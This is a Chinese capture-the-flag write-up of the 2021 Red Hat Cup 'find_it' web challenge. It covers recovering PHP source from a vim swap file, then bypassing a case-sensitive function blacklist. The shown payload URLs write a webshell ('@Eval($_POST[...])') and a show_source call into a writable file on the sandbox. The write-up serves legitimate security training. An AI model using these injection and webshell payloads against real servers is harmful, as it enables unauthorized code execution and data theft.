2021-第四届红帽杯网络安全大赛-Web-find_it

复现环境

https://www.ctfhub.com/#/challenge

考察知识点

  • 代码审计
  • 正则表达式绕过

解题分析

访问robots.txt发现提示 1ndexx.php

view-source:http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/robots.txt

robots.txt

直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。

view-source:http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp

.1ndexx.php.swp

把关键代码粘贴出来看一下运行流程

  1. 打开flag.php读取文件内容

  2. 打开hack.php文件,获取code参数

  3. 正则匹配危险函数

  4. 字符串长度不能超过33

  5. 将code参数的内容写入hack.php

  6. 将flag.php内容写入hack.php

<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
 die("you die");
}
if(strlen($a)>33){
 die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>

测试:输出phpinfo(),phpinfo不是过滤函数,传入之后访问hack.php可利用成功

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?=phpinfo();?%3E

phpinfo

利用方式1:大小写过滤,利用Eval绕过eval限制,成功获取webshell

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20@Eval($_POST[%27aaa%27]);?%3E

Eval

利用方式2:利用show_source高亮代码,再看代码的时候注意到flag.php里的内容会被写入到hack.php中,这样只需要高亮自己就可以看到flag了。

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20show_source(FILE);?%3E

show_source

结束收工!

推荐阅读更多精彩内容